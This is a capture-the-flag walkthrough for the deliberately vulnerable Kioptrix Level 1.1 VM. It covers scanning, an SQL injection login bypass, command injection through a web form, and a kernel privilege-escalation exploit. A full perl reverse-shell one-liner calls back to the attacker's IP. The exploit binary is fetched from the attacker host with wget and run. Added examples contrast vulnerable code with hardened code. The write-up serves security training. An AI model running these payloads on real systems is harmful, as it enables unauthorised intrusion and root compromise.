Kioptrix: Level 1.1 (#2) Walkthrough

https://www.vulnhub.com/entry/kioptrix-level-11-2,23/

Enumeration:

So let's find out the IP of the Kioptrix machine. For that we use the command:

netdiscover
The IP that netdiscover reports for the Kioptrix VM is 192.168.0.105. We scan it with default scripts and version detection:
nmap -sC -sV 192.168.0.105

Port 80:

We visit the webpage hosted on port 80:

http://192.168.0.105
We see some kind of login page.
ctrl+u (view the page source)
Nothing interesting in the source.
gobuster dir -u http://192.168.0.105 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
Let it run in the background while we look at the login form.
We try a SQL injection payload, entering the same string in both the username and password fields. The query behind the form presumably looks like:
SELECT * FROM USERS WHERE username='' AND password=''
so any input that makes the WHERE clause true logs us in without a valid password.
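To see why that works, here is an added example (not code from the walkthrough or from the Kioptrix VM) of a login check that concatenates the fields into the query, next to a parameterised version. The table, the credentials and the payload `' OR '1'='1` are constructed for the demo; the walkthrough does not state which payload was used.

```python
# Added example: string-concatenated login query vs bound parameters.
# sqlite3 stands in for the target's MySQL; the data is constructed.
import sqlite3


def make_db() -> sqlite3.Connection:
    """In-memory stand-in for the target's user table (constructed data)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, password TEXT)")
    conn.execute("INSERT INTO users VALUES ('admin', 'S3cret!')")
    conn.commit()
    return conn


def login_vulnerable(conn: sqlite3.Connection, username: str, password: str) -> bool:
    """Mirrors SELECT * FROM USERS WHERE username='...' AND password='...'
    with the form fields pasted straight into the query string."""
    query = (
        "SELECT * FROM users WHERE username='" + username
        + "' AND password='" + password + "'"
    )
    return conn.execute(query).fetchone() is not None


def login_safe(conn: sqlite3.Connection, username: str, password: str) -> bool:
    """Same check with bound parameters: the input is data, never SQL."""
    query = "SELECT * FROM users WHERE username=? AND password=?"
    return conn.execute(query, (username, password)).fetchone() is not None


# Example payload entered in BOTH fields. The query becomes
#   ... WHERE username='' OR '1'='1' AND password='' OR '1'='1'
# AND binds tighter than OR, so the trailing OR '1'='1' makes every row match.
PAYLOAD = "' OR '1'='1"

if __name__ == "__main__":
    db = make_db()
    print("vulnerable, wrong password:", login_vulnerable(db, "admin", "wrong"))
    print("vulnerable, payload       :", login_vulnerable(db, PAYLOAD, PAYLOAD))
    print("parameterised, payload    :", login_safe(db, PAYLOAD, PAYLOAD))
```

The parameterised version never sees a quote as syntax, so the same payload is simply a username that does not exist.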

EXPLOITATION:

Now let's try command injection. Using the Wappalyzer extension we know that the page is PHP based, and the form behind the login appears to pass our input to a shell command, so we append our own commands after a semicolon:

;bash --version
;perl -v
Once we know perl is available on the target, we start a listener in our terminal:
nc -nlvp 443
and submit a perl reverse shell in the webpage, prefixed with ; as above (192.168.0.104 is our attacking machine):
perl -e 'use Socket;$i="192.168.0.104";$p=443;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'
We get a shell back, but not as root.
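The injection works because the form builds one shell string out of our input. As an added example (not the PHP from the Kioptrix VM), here is the same mistake in Python next to a version that validates the target and never invokes a shell. `echo` stands in for the real `ping` so the demo runs offline, and the target strings are constructed for the demo.

```python
# Added example: shell-string concatenation vs validated argv, no shell.
import ipaddress
import subprocess


def run_vulnerable(target: str) -> str:
    """Concatenates the target into a shell command, the flaw that lets
    ';perl -v' or a reverse shell ride along with the IP address.
    'echo' replaces 'ping' so the example runs offline."""
    cmd = "echo ping -c 3 " + target
    return subprocess.run(cmd, shell=True, capture_output=True, text=True).stdout


def run_hardened(target: str) -> str:
    """Accepts only a literal IP address and passes it as a single argv
    element with no shell, so ';', '|' and '$(...)' are never interpreted."""
    ip = ipaddress.ip_address(target.strip())  # raises ValueError on anything else
    argv = ["echo", "ping", "-c", "3", str(ip)]
    return subprocess.run(argv, capture_output=True, text=True).stdout


if __name__ == "__main__":
    injected = "127.0.0.1; echo INJECTED"  # constructed attacker input
    print(run_vulnerable(injected), end="")
    try:
        run_hardened(injected)
    except ValueError as err:
        print("hardened version rejected input:", err)
```

With the vulnerable function the second `echo` runs as its own command; with the hardened one the request is rejected before anything executes.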

POST EXPLOITATION:

So now let's escalate our privileges. First, the kernel version:

cat /proc/version
We look that version up on Exploit-DB and find a matching local privilege escalation:
https://www.exploit-db.com/exploits/9542
Save the exploit source on the attacking machine and compile it as a 32-bit binary to match the target:
gedit exploit.c
clang -o exploit -m32 exploit.c
Then host it with Apache on the attacking machine and fetch it from the reverse shell (into a directory the web server user can write to, such as /tmp):
mv exploit /var/www/html
service apache2 start
wget 192.168.0.104/exploit
ls
chmod 755 exploit
./exploit
If the binary refuses to start because the attacking box's glibc is newer than the target's, link it statically (add -static) or compile it on the target if a compiler is present there.
